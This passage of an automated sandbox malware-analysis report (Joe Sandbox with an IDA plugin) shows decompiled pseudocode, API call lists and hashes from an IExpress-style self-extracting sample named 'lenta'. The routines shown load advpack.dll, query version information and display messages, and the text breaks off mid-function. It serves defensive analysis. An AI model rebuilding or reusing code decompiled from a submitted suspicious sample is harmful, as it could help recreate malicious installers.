                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A039C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00A039F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$lenta
                                                                                                                                                                                                                                            • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                            • Opcode ID: f35699b9df3693d55ca201ade935795bd1af3c131e4bf8b6c4b197ff85ade964
                                                                                                                                                                                                                                            • Instruction ID: b99d8a0381481445c5ba7bc733b68f2808b67e4a3bf996838cf3008798c3832a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f35699b9df3693d55ca201ade935795bd1af3c131e4bf8b6c4b197ff85ade964
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE91F472B0121C9FEF34CB15ED907AAB3B8AF85344F1541A9D989972D1D7718F82CB41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E00A06495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E00A01781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E00A0658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a06495
                                                                                                                                                                                                                                            0x00a06495
                                                                                                                                                                                                                                            0x00a064a0
                                                                                                                                                                                                                                            0x00a064a7
                                                                                                                                                                                                                                            0x00a064ab
                                                                                                                                                                                                                                            0x00a064bd
                                                                                                                                                                                                                                            0x00a064c2
                                                                                                                                                                                                                                            0x00a064d3
                                                                                                                                                                                                                                            0x00a064df
                                                                                                                                                                                                                                            0x00a064e8
                                                                                                                                                                                                                                            0x00a06502
                                                                                                                                                                                                                                            0x00a064ee
                                                                                                                                                                                                                                            0x00a064f9
                                                                                                                                                                                                                                            0x00a064f9
                                                                                                                                                                                                                                            0x00a06516

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A064DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A064F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A06502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-875882553
                                                                                                                                                                                                                                            • Opcode ID: 4fa2c5822fba1fafbb6d2f86e39980843542066402b3ae8ff55c3fb7f664a162
                                                                                                                                                                                                                                            • Instruction ID: 3622de082d1def7a5c95abcbdcf7b8c87126b8da8274eab965e4e66f3778f0a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fa2c5822fba1fafbb6d2f86e39980843542066402b3ae8ff55c3fb7f664a162
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4901F930A0010CABE750DBA4EC49EEE7378EB64315F500295F585921D0DF70AE97CA51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E00A02773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A02A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A02A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x00a028f1
                                                                                                                                                                                                                                            0x00a028f4
                                                                                                                                                                                                                                            0x00a028f7
                                                                                                                                                                                                                                            0x00a028f9
                                                                                                                                                                                                                                            0x00a028fc
                                                                                                                                                                                                                                            0x00a028ff
                                                                                                                                                                                                                                            0x00a02901
                                                                                                                                                                                                                                            0x00a02907
                                                                                                                                                                                                                                            0x00a02a62
                                                                                                                                                                                                                                            0x00a02a64
                                                                                                                                                                                                                                            0x00a0290d
                                                                                                                                                                                                                                            0x00a0290d
                                                                                                                                                                                                                                            0x00a0290f
                                                                                                                                                                                                                                            0x00a02912
                                                                                                                                                                                                                                            0x00a02920
                                                                                                                                                                                                                                            0x00a02937
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02944
                                                                                                                                                                                                                                            0x00a0294a
                                                                                                                                                                                                                                            0x00a0294f
                                                                                                                                                                                                                                            0x00a02a2f
                                                                                                                                                                                                                                            0x00a02a32
                                                                                                                                                                                                                                            0x00a02a34
                                                                                                                                                                                                                                            0x00a02a37
                                                                                                                                                                                                                                            0x00a02a41
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02955
                                                                                                                                                                                                                                            0x00a0295e
                                                                                                                                                                                                                                            0x00a02962
                                                                                                                                                                                                                                            0x00a02969
                                                                                                                                                                                                                                            0x00a0296f
                                                                                                                                                                                                                                            0x00a02974
                                                                                                                                                                                                                                            0x00a0298c
                                                                                                                                                                                                                                            0x00a02a20
                                                                                                                                                                                                                                            0x00a02a21
                                                                                                                                                                                                                                            0x00a02a27
                                                                                                                                                                                                                                            0x00a02a4c
                                                                                                                                                                                                                                            0x00a02a4f
                                                                                                                                                                                                                                            0x00a02a50
                                                                                                                                                                                                                                            0x00a02a53
                                                                                                                                                                                                                                            0x00a02a56
                                                                                                                                                                                                                                            0x00a02a5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a029b2
                                                                                                                                                                                                                                            0x00a029b2
                                                                                                                                                                                                                                            0x00a029b5
                                                                                                                                                                                                                                            0x00a029bd
                                                                                                                                                                                                                                            0x00a029c3
                                                                                                                                                                                                                                            0x00a029cc
                                                                                                                                                                                                                                            0x00a029d5
                                                                                                                                                                                                                                            0x00a029d7
                                                                                                                                                                                                                                            0x00a029da
                                                                                                                                                                                                                                            0x00a029dd
                                                                                                                                                                                                                                            0x00a029df
                                                                                                                                                                                                                                            0x00a029ec
                                                                                                                                                                                                                                            0x00a029f8
                                                                                                                                                                                                                                            0x00a029fc
                                                                                                                                                                                                                                            0x00a029ff
                                                                                                                                                                                                                                            0x00a02a02
                                                                                                                                                                                                                                            0x00a02a07
                                                                                                                                                                                                                                            0x00a02a0a
                                                                                                                                                                                                                                            0x00a02a0f
                                                                                                                                                                                                                                            0x00a02a19
                                                                                                                                                                                                                                            0x00a02a81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02a0f
                                                                                                                                                                                                                                            0x00a0298c
                                                                                                                                                                                                                                            0x00a02974
                                                                                                                                                                                                                                            0x00a02962
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0294f
                                                                                                                                                                                                                                            0x00a02912
                                                                                                                                                                                                                                            0x00a02a65
                                                                                                                                                                                                                                            0x00a02a68
                                                                                                                                                                                                                                            0x00a02a6c
                                                                                                                                                                                                                                            0x00a02a6f
                                                                                                                                                                                                                                            0x00a02a6f
                                                                                                                                                                                                                                            0x00a02a7d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00A02A6F
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: CharUpperA.USER32(E10713FE,00000000,00000000,00000000), ref: 00A027A8
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: CharNextA.USER32(0000054D), ref: 00A027B5
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: CharNextA.USER32(00000000), ref: 00A027BC
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02829
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: RegQueryValueExA.ADVAPI32(?,00A01140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02852
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02870
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A028A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A03938,?,?,?,?,-00000005), ref: 00A02958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00A02969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A03938,?,?,?,?,-00000005,?), ref: 00A02A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A02A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: 6c2b5fed15aef8c0576ef376a0944dcaeef12f2f1dde28971fb59a556aa8af45
                                                                                                                                                                                                                                            • Instruction ID: 94d88211ba34228dc83c1f498b813d4aba27b192717b8ccde1ee5654e8f71a24
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c2b5fed15aef8c0576ef376a0944dcaeef12f2f1dde28971fb59a556aa8af45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A511C31E0021DEFCB21DF98E888AAEFBB5FF48740F14416AE915E3251DB319941DB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E00A04169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E00A0468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E00A0468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E00A044B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a0417d
                                                                                                                                                                                                                                            0x00a0418f
                                                                                                                                                                                                                                            0x00a04193
                                                                                                                                                                                                                                            0x00a041b7
                                                                                                                                                                                                                                            0x00a041d3
                                                                                                                                                                                                                                            0x00a041e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a041e7
                                                                                                                                                                                                                                            0x00a041d5
                                                                                                                                                                                                                                            0x00a041d6
                                                                                                                                                                                                                                            0x00a041d8
                                                                                                                                                                                                                                            0x00a041d9
                                                                                                                                                                                                                                            0x00a041da
                                                                                                                                                                                                                                            0x00a041df
                                                                                                                                                                                                                                            0x00a041e1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a041e1
                                                                                                                                                                                                                                            0x00a041b9
                                                                                                                                                                                                                                            0x00a041ba
                                                                                                                                                                                                                                            0x00a041bc
                                                                                                                                                                                                                                            0x00a041bd
                                                                                                                                                                                                                                            0x00a041be
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a041be
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A030B4), ref: 00A04189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A030B4), ref: 00A041E7
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: 2feca83d8367a127e61556de9b4027a0e2670551494d36ea8ddc2a63f03d937b
                                                                                                                                                                                                                                            • Instruction ID: de4b7e2cd1a5ccb608c5f0bd702cbd69c1a4522739014850cc5c419446bd4b07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2feca83d8367a127e61556de9b4027a0e2670551494d36ea8ddc2a63f03d937b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B401D1F130031C7BF3252A667C96FBB218EFBEC795F004229B706E11C09AA9CC0241B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E00A043D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa09a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
